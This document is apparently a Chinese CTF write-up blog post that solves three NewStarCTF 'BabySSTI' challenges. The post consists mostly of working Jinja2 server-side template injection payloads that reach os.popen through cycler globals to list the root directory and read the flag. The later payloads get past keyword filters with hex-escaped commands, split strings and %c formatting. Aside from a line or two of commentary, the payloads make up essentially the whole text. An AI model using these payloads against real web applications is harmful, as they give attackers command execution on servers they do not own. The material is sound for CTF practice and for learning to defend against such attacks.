[NewStarCTF 公开赛赛道]SSTI

baozongwi Lv5
  2024-08-25 16:09:17 2024-08-25 16:09:17 Created   2024-10-02 20:21:24 2024-10-02 20:21:24 Updated      372 Words  2 Mins  

[NewStarCTF 公开赛赛道]BabySSTI_One

过滤了常用的那几个关键词,但是并不是很影响我的姿势

1
2
3
{{cycler.next.__globals__.__builtins__.__import__('os').popen('ls /').read()}}

{{cycler.next.__globals__.__builtins__.__import__('os').popen('tac /f*').read()}}

[NewStarCTF 公开赛赛道]BabySSTI_Two

1
2
3
{%set ls='\\x6c\\x73\\x20\\x2f'%}{{cycler.next['__g''lobals__']['__b''uiltins__'].__import__('os')['p''open'](ls).read()}}

{%set ta='\\x74\\x61\\x63\\x20\\x2f\\x66\\x2a'%}{{cycler.next['__g''lobals__']['__b''uiltins__'].__import__('os')['p''open'](ta).read()}}

这个payload能看懂吧,就是一个16进制的ascii绕过,还是能接受的

[NewStarCTF 公开赛赛道]BabySSTI_Three

1
2
3
{{cycler.next['%s%s'%('%s%s'%(('%c'%95)*2,'g''lobals'),('%c'%95)*2)]['%s%s'%('%s%s'%(('%c'%95)*2,'b''uiltins'),('%c'%95)*2)]['%s%s'%('%s%s'%(('%c'%95)*2,'import'),('%c'%95)*2)]('os')['p''open']('\\x6c\\x73\\x20\\x2f').read()}}

{{cycler.next['%s%s'%('%s%s'%(('%c'%95)*2,'g''lobals'),('%c'%95)*2)]['%s%s'%('%s%s'%(('%c'%95)*2,'b''uiltins'),('%c'%95)*2)]['%s%s'%('%s%s'%(('%c'%95)*2,'import'),('%c'%95)*2)]('os')['p''open']('\\x74\\x61\\x63\\x20\\x2f\\x66\\x2a').read()}}
  • Title: [NewStarCTF 公开赛赛道]SSTI
  • Author: baozongwi
  • Created at : 2024-08-25 16:09:17
  • Updated at : 2024-10-02 20:21:24
  • Link: https://baozongwi.xyz/2024/08/25/NewStarCTF-公开赛赛道-SsTi/
  • License: This work is licensed under CC BY-NC-SA 4.0.
推荐阅读
php反序列化\pop php反序列化\pop DSBCTF2024 DSBCTF2024 SHCTF2024 SHCTF2024
推荐阅读
php反序列化\pop php反序列化\pop DSBCTF2024 DSBCTF2024
Comments
On this page
[NewStarCTF 公开赛赛道]SSTI
  1. [NewStarCTF 公开赛赛道]BabySSTI_One
  2. [NewStarCTF 公开赛赛道]BabySSTI_Two
  3. [NewStarCTF 公开赛赛道]BabySSTI_Three